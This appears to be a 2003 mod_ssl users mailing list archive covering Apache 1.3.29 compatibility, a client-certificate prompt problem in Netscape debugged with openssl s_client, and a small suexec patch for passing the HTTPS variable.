      "A society that will trade a little liberty for a little order
             will lose both and deserve neither" - T.Jefferson
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 29 15:41:40 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E25F2A8A81; Wed, 29 Oct 2003 15:41:40 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from d101.x-mailer.de (d101.x-mailer.de [212.162.12.2])
	by master.modssl.org (Postfix) with ESMTP id E1466A8A4F
	for ; Wed, 29 Oct 2003 15:41:24 +0100 (CET)
Received: from [127.0.0.1] (helo=172.29.248.231)
	by d101.x-mailer.de with asmtp (Exim 4.24)
	id 1AErVd-0002Xj-0j; Wed, 29 Oct 2003 15:41:17 +0100
From: Andreas Gietl 
Organization: e-admin internet gmbh
To: modssl-users@modssl.org, Jim Jagielski 
Subject: Re: apache 1.3.29?
Date: Wed, 29 Oct 2003 15:40:18 +0100
User-Agent: KMail/1.5.4
References: <200310291439.h9TEdd309679@devsys.jaguNET.com>
In-Reply-To: <200310291439.h9TEdd309679@devsys.jaguNET.com>
MIME-Version: 1.0
Content-Type: text/plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Message-Id: <200310291540.18114.a.gietl@e-admin.de>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Andreas Gietl 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Wednesday 29 October 2003 15:39, Jim Jagielski wrote:

i guess there will be a new patch within the next days/hours?

> Yes it will, but the patch will not apply "cleanly". Using --force
> is recommended.
>
> Peter Horst wrote:
> > Just noticed that apache 1.3.29 was released. Will mod_ssl-2.8.15 work
> > with this? I'm using openssl-0.9.7c.
> >
> > Thanks much.
> >
> > Peter
> >
> > --
> > What do you use on Linux to do your word processing? spreadsheets? slide
> > shows? Do you feel that ms-dos and ms-dos-office is really a better
> > mouse trap and worth the price? We certainly differ on this point I
> > think, because I believe Linux is definitely good enough for the average
> > user, most of whom are idiots.
> >  -- Alan DuBoff, linux-elitists mailing list, 12/31/02
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org

-- 
e-admin internet gmbh
Andreas Gietl                                            tel +49 941 3810884
Ludwig-Thoma-Strasse 35                      fax +49 (0)1805/39160 - 29104
93051 Regensburg                                  mobil +49 171 6070008

PGP/GPG-Key unter http://www.e-admin.de/gpg.html




______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 29 15:47:58 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C37F4A8A4B; Wed, 29 Oct 2003 15:47:58 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from devsys.jaguNET.com (devsys.jaguNET.com [209.133.192.6])
	by master.modssl.org (Postfix) with ESMTP id 7078EA893F
	for ; Wed, 29 Oct 2003 15:47:57 +0100 (CET)
Received: (from jim@localhost)
	by devsys.jaguNET.com (8.11.7a/jag-2.6) id h9TElr409832
	for modssl-users@modssl.org; Wed, 29 Oct 2003 09:47:53 -0500 (EST)
From: Jim Jagielski 
Message-Id: <200310291447.h9TElr409832@devsys.jaguNET.com>
Subject: Re: apache 1.3.29?
To: modssl-users@modssl.org
Date: Wed, 29 Oct 2003 09:47:49 -0500 (EST)
In-Reply-To: <200310291540.18114.a.gietl@e-admin.de> from "Andreas Gietl" at Oct 29, 2003 03:40:18 PM
X-Mailer: ELM [version 2.5 PL5]
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jim Jagielski 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Andreas Gietl wrote:
> 
> On Wednesday 29 October 2003 15:39, Jim Jagielski wrote:
> 
> i guess there will be a new patch within the next days/hours?
> 

I would guess, but that's not my area :)

-- 
===========================================================================
   Jim Jagielski   [|]   jim@jaguNET.com   [|]   http://www.jaguNET.com/
      "A society that will trade a little liberty for a little order
             will lose both and deserve neither" - T.Jefferson
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 29 17:15:04 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A9258A89E6; Wed, 29 Oct 2003 17:15:04 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from calypso.urec.cnrs.fr (calypso.urec.cnrs.fr [194.57.137.114])
	by master.modssl.org (Postfix) with ESMTP id 0FFA1A893A
	for ; Wed, 29 Oct 2003 17:14:48 +0100 (CET)
Received: from urec.cnrs.fr (pan.paris.urec.cnrs.fr [194.57.137.45])
          by calypso.urec.cnrs.fr (8.12.8p1/jtpda-5.4) with ESMTP id h9TGEiqb006872
          for ; Wed, 29 Oct 2003 17:14:44 +0100
Message-ID: <3F9FE791.3020909@urec.cnrs.fr>
Date: Wed, 29 Oct 2003 17:15:13 +0100
From: xavier jeannin 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; fr-FR; rv:1.0.2) Gecko/20030208 Netscape/7.02
X-Accept-Language: fr-fr, fr
MIME-Version: 1.0
To: modssl-users 
Subject: Netscape ask always certificat 
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: xavier jeannin 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello

I have looked for information in Archive about my problem. I don't find 
answer to my problem, sorry in advance to ask a question about a very 
known problem.

I have developped Web application, that uses X509 certificat. Netscape 
ask at each time (page) the certificat. As my users have several 
certificates they do not use the option "Select Automaticly" in 
netscape,  I have to say to my user to use now this option and create  a 
netscape's profile for every certificat.

First, I have compile Apache with MM and use :
SSLSessionCache        shm:/usr/local/apache/logs/ssl_gscache(2048000)
SSLSessionCacheTimeout  1800
but  it does not work.

Does anyone got a better idea ?
Thanks in advance
--xj

-- 
_____________________________________________________________________________________________
Xavier Jeannin
UREC/CNRS Université P. & M. Curie, Courrier : case 171, 4 place Jussieu 75252 PARIS CEDEX 05
Tél : 01 44 27 42 59 - Fax : 01 44 27 42 61 - Courriel : jeannin@urec.cnrs.fr


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 29 18:08:11 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id EAB3AA8A4B; Wed, 29 Oct 2003 18:08:10 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id B32BDA893F
	for ; Wed, 29 Oct 2003 18:07:52 +0100 (CET)
Received: by toftum.dk (Postfix, from userid 1001)
	id 1CF896E4028; Wed, 29 Oct 2003 18:07:42 +0100 (CET)
Date: Wed, 29 Oct 2003 18:07:42 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: Netscape ask always certificat
Message-ID: <20031029170741.GC27125@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <3F9FE791.3020909@urec.cnrs.fr>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <3F9FE791.3020909@urec.cnrs.fr>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Wed, Oct 29, 2003 at 05:15:13PM +0100, xavier jeannin wrote:
> I have developped Web application, that uses X509 certificat. Netscape 
> ask at each time (page) the certificat. As my users have several 
> certificates they do not use the option "Select Automaticly" in 
> netscape,  I have to say to my user to use now this option and create  a 
> netscape's profile for every certificat.
> 
> First, I have compile Apache with MM and use :
> SSLSessionCache        shm:/usr/local/apache/logs/ssl_gscache(2048000)
> SSLSessionCacheTimeout  1800
> but  it does not work.
> 
"but  it does not work" - how should that be understood? that SSLSessionCache
does not work, or that the users are still being asked for the certificate?
The simplest way to test sessions away from the browser is to use openssl
s_client with the -reconnect option - that should tell you wether session
caching is in effect or not. 
Usually when sessions are enabled in apache, but the browser keeps asking for
the cert, then it is a setting in the browser - I seem to recall that 
Netscape had an option to ask for the password on every use.

vh

Mads Toftum
-- 
Speaking at ApacheCon 2003 - http://ApacheCon.com/
T03, "Apache 2 mod_ssl tutorial" (3h)
WE03, "Troubleshooting Apache configurations" 
WE11, "Apache mod_rewrite, the Swiss Army Knife of URL manipulation" 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 29 19:55:21 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 69D54A89E6; Wed, 29 Oct 2003 19:55:21 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web20510.mail.yahoo.com (web20510.mail.yahoo.com [216.136.226.145])
	by master.modssl.org (Postfix) with SMTP id 2E2A8A893A
	for ; Wed, 29 Oct 2003 19:55:04 +0100 (CET)
Message-ID: <20031029185458.43613.qmail@web20510.mail.yahoo.com>
Received: from [62.129.121.33] by web20510.mail.yahoo.com via HTTP; Wed, 29 Oct 2003 10:54:58 PST
Date: Wed, 29 Oct 2003 10:54:58 -0800 (PST)
From: Matt Stevenson 
Subject: Re: Netscape ask always certificat 
To: modssl-users@modssl.org
In-Reply-To: <3F9FE791.3020909@urec.cnrs.fr>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Matt Stevenson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

Try using the status module

ExtendedStatus On

    SetHandler server-status


That gives some info about ssl sessions near the
bottom. Currently I'm using client certs and firebird
with ask every time set. This results in a prompt
every  300 seconds as the session times out. Which
version of netscape?  

Regards
Matt

--- xavier jeannin 
wrote:
> Hello
> 
> I have looked for information in Archive about my
> problem. I don't find 
> answer to my problem, sorry in advance to ask a
> question about a very 
> known problem.
> 
> I have developped Web application, that uses X509
> certificat. Netscape 
> ask at each time (page) the certificat. As my users
> have several 
> certificates they do not use the option "Select
> Automaticly" in 
> netscape,  I have to say to my user to use now this
> option and create  a 
> netscape's profile for every certificat.
> 
> First, I have compile Apache with MM and use :
> SSLSessionCache       
> shm:/usr/local/apache/logs/ssl_gscache(2048000)
> SSLSessionCacheTimeout  1800
> but  it does not work.
> 
> Does anyone got a better idea ?
> Thanks in advance
> --xj
> 
> -- 
>
_____________________________________________________________________________________________
> Xavier Jeannin
> UREC/CNRS Université P. & M. Curie, Courrier : case
> 171, 4 place Jussieu 75252 PARIS CEDEX 05
> Tél : 01 44 27 42 59 - Fax : 01 44 27 42 61 -
> Courriel : jeannin@urec.cnrs.fr
> 
> 
>
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)               
>    www.modssl.org
> User Support Mailing List                     
> modssl-users@modssl.org
> Automated List Manager                           
majordomo@modssl.org


__________________________________
Do you Yahoo!?
Exclusive Video Premiere - Britney Spears
http://launch.yahoo.com/promos/britneyspears/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 30 09:06:53 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 76EAEA8A4B; Thu, 30 Oct 2003 09:06:53 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from visp.engelschall.com (visp.engelschall.com [195.27.176.148])
	by master.modssl.org (Postfix) with ESMTP id 93CE8A895E
	for ; Thu, 30 Oct 2003 09:06:52 +0100 (CET)
Received: by visp.engelschall.com (Postfix, from userid 1000)
	id 6DDA24CE56C; Thu, 30 Oct 2003 09:06:52 +0100 (CET)
Date: Thu, 30 Oct 2003 09:06:52 +0100
From: "Ralf S. Engelschall" 
To: modssl-users@modssl.org
Subject: Re: apache 1.3.29?
Message-ID: <20031030080652.GA50072@engelschall.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.4.1i
Organization: Engelschall, Germany.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ralf S. Engelschall" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


In article <200310291447.h9TElr409832@devsys.jaguNET.com> you wrote:
> Andreas Gietl wrote:
>> 
>> On Wednesday 29 October 2003 15:39, Jim Jagielski wrote:
>> 
>> i guess there will be a new patch within the next days/hours?
> 
> I would guess, but that's not my area :)

Yes, there will be a mod_ssl 2.8.16 released today or tomorrow. I've
already upgraded mod_ssl to Apache 1.3.29, but I've still to include
some other fixes. But 2.8.15 works fine with Apache 1.3.29, so no need
to hurry here...
                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 30 09:23:54 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C3D98A8A4B; Thu, 30 Oct 2003 09:23:54 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from calypso.urec.cnrs.fr (calypso.urec.cnrs.fr [194.57.137.114])
	by master.modssl.org (Postfix) with ESMTP id 636D8A895E
	for ; Thu, 30 Oct 2003 09:23:38 +0100 (CET)
Received: from urec.cnrs.fr (pan.paris.urec.cnrs.fr [194.57.137.45])
          by calypso.urec.cnrs.fr (8.12.8p1/jtpda-5.4) with ESMTP id h9U8NYqb008409
          ; Thu, 30 Oct 2003 09:23:34 +0100
Message-ID: <3FA0CAA4.8050103@urec.cnrs.fr>
Date: Thu, 30 Oct 2003 09:24:04 +0100
From: xavier jeannin 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; fr-FR; rv:1.0.2) Gecko/20030208 Netscape/7.02
X-Accept-Language: fr-fr, fr
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Netscape ask always certificat
References: <3F9FE791.3020909@urec.cnrs.fr> <20031029170741.GC27125@toftum.dk>
Content-Type: multipart/alternative;
 boundary="------------080700020008080904090404"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: xavier jeannin 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


--------------080700020008080904090404
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit

Hi

Thanks Mads for your answer :
I should write Netscape still ask the cert at each page  instead of "it 
does not work".
I mad the test you suggest, here is the result

root@engine jeannin]# openssl s_client -host intranet.stic.cnrs.fr -port 
443 -cert /usr/local/apache/conf/ssl.crt/intranet.stic.cns.fr.crt  -key 
/usr/local/apache/conf/ssl.key/intranet.stic.cnrs.fr.key -CAfile 
/usr/local/apache/conf/ssl.crt/ca-bundle.crt -reconect -ssl3
CONNECTED(00000003)
depth=2 /C=FR/O=CNRS/CN=CNRS
verify return:1
depth=1 /C=FR/O=CNRS/CN=CNRS-Standard
verify return:1
depth=0 
/C=FR/O=CNRS/OU=UPS836/CN=intranet.stic.cnrs.fr/Email=Xavier.Jeannin@urec.cnrs.fr
verify return:1
24359:error:14094413:SSL routines:SSL3_READ_BYTES:sslv3 alert 
unsupported certificate:s3_pkt.c:1031:SSL alert number 43
24359:error:1409E0E5:SSL routines:SSL3_WRITE_BYTES:ssl handshake 
failure:s3_pkt.c:514:

I am sorry but I do not understand the response. I am sure that my cert 
is valid, my private key too, and my cafile too.
Do you know where I can read documentation that explain the error 
message ? perhaps it is a bad used of openssl client.
thank  you
--xj

Mads Toftum a écrit:

>On Wed, Oct 29, 2003 at 05:15:13PM +0100, xavier jeannin wrote:
>  
>
>>I have developped Web application, that uses X509 certificat. Netscape 
>>ask at each time (page) the certificat. As my users have several 
>>certificates they do not use the option "Select Automaticly" in 
>>netscape,  I have to say to my user to use now this option and create  a 
>>netscape's profile for every certificat.
>>
>>First, I have compile Apache with MM and use :
>>SSLSessionCache        shm:/usr/local/apache/logs/ssl_gscache(2048000)
>>SSLSessionCacheTimeout  1800
>>but  it does not work.
>>
>>    
>>
>"but  it does not work" - how should that be understood? that SSLSessionCache
>does not work, or that the users are still being asked for the certificate?
>The simplest way to test sessions away from the browser is to use openssl
>s_client with the -reconnect option - that should tell you wether session
>caching is in effect or not. 
>Usually when sessions are enabled in apache, but the browser keeps asking for
>the cert, then it is a setting in the browser - I seem to recall that 
>Netscape had an option to ask for the password on every use.
>
>vh
>
>Mads Toftum
>  
>

-- 
_____________________________________________________________________________________________
Xavier Jeannin
UREC/CNRS Université P. & M. Curie, Courrier : case 171, 4 place Jussieu 75252 PARIS CEDEX 05
Tél : 01 44 27 42 59 - Fax : 01 44 27 42 61 - Courriel : jeannin@urec.cnrs.fr



--------------080700020008080904090404
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit




  


Hi 



Thanks Mads for your answer :

I should write Netscape still ask the cert at each page  instead of "it does
not work".

I mad the test you suggest, here is the result



root@engine jeannin]# openssl s_client -host intranet.stic.cnrs.fr -port
443 -cert /usr/local/apache/conf/ssl.crt/intranet.stic.cns.fr.crt  -key /usr/local/apache/conf/ssl.key/intranet.stic.cnrs.fr.key
-CAfile /usr/local/apache/conf/ssl.crt/ca-bundle.crt -reconect -ssl3

CONNECTED(00000003)

depth=2 /C=FR/O=CNRS/CN=CNRS

verify return:1

depth=1 /C=FR/O=CNRS/CN=CNRS-Standard

verify return:1

depth=0 /C=FR/O=CNRS/OU=UPS836/CN=intranet.stic.cnrs.fr/Email=Xavier.Jeannin@urec.cnrs.fr

verify return:1

24359:error:14094413:SSL routines:SSL3_READ_BYTES:sslv3 alert unsupported
certificate:s3_pkt.c:1031:SSL alert number 43

24359:error:1409E0E5:SSL routines:SSL3_WRITE_BYTES:ssl handshake failure:s3_pkt.c:514:



I am sorry but I do not understand the response. I am sure that my cert is
valid, my private key too, and my cafile too.  

Do you know where I can read documentation that explain the error message
? perhaps it is a bad used of openssl client.

thank  you

--xj



Mads Toftum a écrit:



  
On Wed, Oct 29, 2003 at 05:15:13PM +0100, xavier jeannin wrote:
  

  

    
I have developped Web application, that uses X509 certificat. Netscape 
ask at each time (page) the certificat. As my users have several 
certificates they do not use the option "Select Automaticly" in 
netscape,  I have to say to my user to use now this option and create  a 
netscape's profile for every certificat.

First, I have compile Apache with MM and use :
SSLSessionCache        shm:/usr/local/apache/logs/ssl_gscache(2048000)
SSLSessionCacheTimeout  1800
but  it does not work.

    

  

  
"but  it does not work" - how should that be understood? that SSLSessionCache
does not work, or that the users are still being asked for the certificate?
The simplest way to test sessions away from the browser is to use openssl
s_client with the -reconnect option - that should tell you wether session
caching is in effect or not. 
Usually when sessions are enabled in apache, but the browser keeps asking for
the cert, then it is a setting in the browser - I seem to recall that 
Netscape had an option to ask for the password on every use.

vh

Mads Toftum
  






-- 
_____________________________________________________________________________________________
Xavier Jeannin
UREC/CNRS Université P. & M. Curie, Courrier : case 171, 4 place Jussieu 75252 PARIS CEDEX 05
Tél : 01 44 27 42 59 - Fax : 01 44 27 42 61 - Courriel : jeannin@urec.cnrs.fr







--------------080700020008080904090404--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 30 09:45:10 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A0846A89E6; Thu, 30 Oct 2003 09:45:10 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id 7E652A8933
	for ; Thu, 30 Oct 2003 09:44:54 +0100 (CET)
Received: by toftum.dk (Postfix, from userid 1001)
	id CC7206E4028; Thu, 30 Oct 2003 09:44:47 +0100 (CET)
Date: Thu, 30 Oct 2003 09:44:47 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: Netscape ask always certificat
Message-ID: <20031030084447.GA23664@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <3F9FE791.3020909@urec.cnrs.fr> <20031029170741.GC27125@toftum.dk> <3FA0CAA4.8050103@urec.cnrs.fr>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <3FA0CAA4.8050103@urec.cnrs.fr>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, Oct 30, 2003 at 09:24:04AM +0100, xavier jeannin wrote:
> 24359:error:14094413:SSL routines:SSL3_READ_BYTES:sslv3 alert 
> unsupported certificate:s3_pkt.c:1031:SSL alert number 43
> 24359:error:1409E0E5:SSL routines:SSL3_WRITE_BYTES:ssl handshake 
> failure:s3_pkt.c:514:
> 
> I am sorry but I do not understand the response. I am sure that my cert 
> is valid, my private key too, and my cafile too.
> Do you know where I can read documentation that explain the error 
> message ? perhaps it is a bad used of openssl client.

openssl s_client expects the certificate and key to be in PEM format -

openssl x509 -in cert.crt -inform DER -out cert.pem -outform PEM

vh

Mads Toftum
-- 
Speaking at ApacheCon 2003 - http://ApacheCon.com/
T03, "Apache 2 mod_ssl tutorial" (3h)
WE03, "Troubleshooting Apache configurations" 
WE11, "Apache mod_rewrite, the Swiss Army Knife of URL manipulation" 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 30 09:54:03 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9AB91A89E6; Thu, 30 Oct 2003 09:54:03 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from fermat.math.technion.ac.il (fermat.math.technion.ac.il [132.68.115.6])
	by master.modssl.org (Postfix) with ESMTP id 89565A8933
	for ; Thu, 30 Oct 2003 09:54:01 +0100 (CET)
Received: from fermat.math.technion.ac.il (localhost [127.0.0.1])
	by fermat.math.technion.ac.il (8.12.10/8.12.10) with ESMTP id h9U8rWxE013937;
	Thu, 30 Oct 2003 10:53:35 +0200 (IST)
Received: (from rl@localhost)
	by fermat.math.technion.ac.il (8.12.10/8.12.10/Submit) id h9U8rWl4013936;
	Thu, 30 Oct 2003 10:53:32 +0200 (IST)
X-Authentication-Warning: fermat.math.technion.ac.il: rl set sender to rl@math.technion.ac.il using -f
Date: Thu, 30 Oct 2003 10:53:31 +0200
From: "Zvi Har'El" 
To: modssl-users@modssl.org
Cc: rse@engelschall.com
Subject: Re: apache 1.3.29?
Message-ID: <20031030085331.GA13878@fermat.math.technion.ac.il>
References: <20031030080652.GA50072@engelschall.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20031030080652.GA50072@engelschall.com>
User-Agent: Mutt/1.4.1i
Hebrew-Date: 4 Heshvan 5764
X-PGP-Public-Key: http://www.math.technion.ac.il/~rl/pubkey.html
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Zvi Har'El" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Ralf,

If you don't mind, please include a fix which allows the HTTPS env variable
to be passed by suexec

--- apache_1.3.28/src/support/suexec.c.~20030719062731~ Sat Jul 19 09:27:31
2003
+++ apache_1.3.28/src/support/suexec.c  Tue Aug 26 16:49:20 2003
@@ -134,7 +134,7 @@
     /* variable name starts with */
     "HTTP_",
 #ifdef MOD_SSL
-    "HTTPS_",
+    "HTTPS=",
     "SSL_",
 #endif

This is already included in apache 2

Thanks,

Zvi.


On Thu, 30 Oct 2003 09:06:52 +0100, Ralf S. Engelschall wrote about "Re: apache 1.3.29?":
> 
> In article <200310291447.h9TElr409832@devsys.jaguNET.com> you wrote:
> > Andreas Gietl wrote:
> >> 
> >> On Wednesday 29 October 2003 15:39, Jim Jagielski wrote:
> >> 
> >> i guess there will be a new patch within the next days/hours?
> > 
> > I would guess, but that's not my area :)
> 
> Yes, there will be a mod_ssl 2.8.16 released today or tomorrow. I've
> already upgraded mod_ssl to Apache 1.3.29, but I've still to include
> some other fixes. But 2.8.15 works fine with Apache 1.3.29, so no need
> to hurry here...
>                                        Ralf S. Engelschall
>                                        rse@engelschall.com
>                                        www.engelschall.com
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

-- 
Dr. Zvi Har'El     mailto:rl@math.technion.ac.il     Department of Mathematics
tel:+972-54-227607 icq:179294841     Technion - Israel Institute of Technology
fax:+972-4-8293388 http://www.math.technion.ac.il/~rl/     Haifa 32000, ISRAEL
"If you can't say somethin' nice, don't say nothin' at all." -- Thumper (1942)
                            Thursday, 4 Heshvan 5764, 30 October 2003, 10:49AM
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 30 11:40:45 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 80F6DA89E6; Thu, 30 Oct 2003 11:40:45 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from calypso.urec.cnrs.fr (calypso.urec.cnrs.fr [194.57.137.114])
	by master.modssl.org (Postfix) with ESMTP id 0D1FCA8933
	for ; Thu, 30 Oct 2003 11:40:27 +0100 (CET)
Received: from urec.cnrs.fr (pan.paris.urec.cnrs.fr [194.57.137.45])
          by calypso.urec.cnrs.fr (8.12.8p1/jtpda-5.4) with ESMTP id h9UAeMqb013269
          ; Thu, 30 Oct 2003 11:40:22 +0100
Message-ID: <3FA0EAB4.5060207@urec.cnrs.fr>
Date: Thu, 30 Oct 2003 11:40:52 +0100
From: xavier jeannin 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; fr-FR; rv:1.0.2) Gecko/20030208 Netscape/7.02
X-Accept-Language: fr-fr, fr
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Netscape ask always certificat
References: <3F9FE791.3020909@urec.cnrs.fr> <20031029170741.GC27125@toftum.dk> <3FA0CAA4.8050103@urec.cnrs.fr> <20031030084447.GA23664@toftum.dk>
Content-Type: multipart/alternative;
 boundary="------------020103090009010106090102"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: xavier jeannin 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


--------------020103090009010106090102
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit

Ok Sorry I correct my mistake so now I  can connect  with SSL Client and 
get my HTML Page.
Thank you it is a powerful tools to debug (redirect, etc)

I send to you the response I get, I am not capable to analyse the SSL 
sequence.
Is it a normal sequence ?
Seeing this can we deduce the session cache work fine ?
In this example, I have only ask for one page, I have not browsed into 
my site so can we deduce anything from this example ?
Is  it possible to browse into a site with ssl_client (see cookie and 
session pb) ?

thank you
--xj
 
CONNECTED(00000003)
---
Certificate chain
 0 
s:/C=FR/O=CNRS/OU=UPS836/CN=intranet.stic.cnrs.fr/Email=Xavier.Jeannin@urec.cnrs.fr
